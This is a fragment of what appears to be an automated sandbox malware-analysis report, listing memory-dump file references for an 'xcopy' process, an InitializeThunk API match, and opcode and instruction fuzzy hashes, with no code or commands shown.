                                                                                              • Opcode Fuzzy Hash: 72162cf7a38d1e182989450252ff6fd47292c493cf9a29ff492c5210c1766369
                                                                                              • Instruction Fuzzy Hash: 4701D2B6200208BFDB44DE8DDC84EDB77AEEF8DB14F408108BA09E3240D630F8518BA5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: c1b6663d98e2b5e07814846b8e6ca7dc30cd8ddddbfe0c1f3aedfa67d6020662
                                                                                              • Instruction ID: f292cf21296255019f896a589b75333d1d1aa59b17bb375139c3af48e825d93f
                                                                                              • Opcode Fuzzy Hash: c1b6663d98e2b5e07814846b8e6ca7dc30cd8ddddbfe0c1f3aedfa67d6020662
                                                                                              • Instruction Fuzzy Hash: 87B09B719035C5C5EA51F7608608717794867D1701F19C471D2030741F4779D1E1E275